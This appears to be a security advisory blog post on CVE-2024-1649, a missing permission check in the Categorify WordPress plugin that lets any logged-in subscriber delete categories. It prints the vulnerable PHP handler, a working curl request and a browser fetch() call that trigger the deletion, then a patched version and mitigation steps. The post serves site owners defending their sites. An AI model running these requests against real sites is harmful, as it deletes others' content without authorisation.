If you’re a WordPress site owner using the Categorify plugin, it’s time to pay attention. In early 2024, security researchers found a serious vulnerability (CVE-2024-1649) in the Categorify plugin—all versions up to 1..7.4. This bug lets any logged-in user, even those with the lowest Subscriber role, delete any category on your site with a simple request.
This post breaks down how the exploit works, how big the risk is, and what you can do to stay safe.
What’s the Problem?
In WordPress, plugins often add their own functions for managing content. To keep things safe, WordPress uses “capabilities” to make sure only certain users can do certain actions (like deleting categories). But with Categorify, the plugin forgot to check for proper permissions in one of its AJAX functions. This means even subscribers, who normally can’t do much, could send a request to delete categories.
The vulnerable code is in a function called categorifyAjaxDeleteCategory.
Here’s a simplified version of what the problem looks like inside the plugin’s PHP code
// Inside categorify-ajax.php
add_action('wp_ajax_categorifyAjaxDeleteCategory', 'categorifyAjaxDeleteCategory');
function categorifyAjaxDeleteCategory() {
$cat_id = $_POST['cat_id'];
// Missing a capability check here!
wp_delete_category($cat_id);
wp_send_json_success(array('message' => 'Category deleted.'));
}
Notice the missing capability check! There’s no current_user_can('manage_categories') or similar to prevent unauthorized users from calling this function.
Who’s Affected?
All Categorify plugin users running any version up to and including 1..7.4. If you use this plugin and allow user registration or have subscribers, you’re at risk.
How Would an Attacker Use This?
Any logged-in user—even just a regular subscriber—can send a specially-crafted AJAX request to delete any category. Here’s how it works in practice.
Example Request (using curl)
curl -X POST "https://your-site.com/wp-admin/admin-ajax.php"; \
-d "action=categorifyAjaxDeleteCategory" \
-d "cat_id=3" \
-b "wordpress_logged_in_[hash]=[login_cookie]"
Replace cat_id=3 with the actual ID of the category they want to delete. The -b flag is for providing a valid login cookie.
JavaScript Example (run in browser console after login)
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
body: 'action=categorifyAjaxDeleteCategory&cat_id=3'
})
.then(response => response.json())
.then(data => console.log(data));
Result: The specified category is deleted—no questions asked.
Data Loss: Important post categories could be deleted by any logged-in user.
- Website Disruption: Deleting important categories can break site navigation, post structure, or plugin features relying on categories.
1. Update Immediately
As of now, check the Categorify plugin page for a patched version. If no patch is available, consider disabling the plugin.
If you have basic PHP skills, you can hotfix the vulnerable function
function categorifyAjaxDeleteCategory() {
if (!current_user_can('manage_categories')) {
wp_send_json_error(array('message' => 'Unauthorized'), 403);
return;
}
$cat_id = $_POST['cat_id'];
wp_delete_category($cat_id);
wp_send_json_success(array('message' => 'Category deleted.'));
}
3. Restrict User Registration
If your site allows anyone to sign up, turn that off in Settings > General > Membership (“Anyone can register”).
Official References
- Wordfence Advisory (WordPress Plugin Vulnerabilities)
- CVE Entry for CVE-2024-1649
- Categorify Plugin on WordPress.org
Conclusion
CVE-2024-1649 is a reminder to keep your plugins updated and always check for security advisories. WordPress powers millions of sites, but its power comes with responsibility—yours. Don’t let a simple oversight open your site to unwanted damage. Audit your plugins regularly, and stay ahead of threats!
Timeline
Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC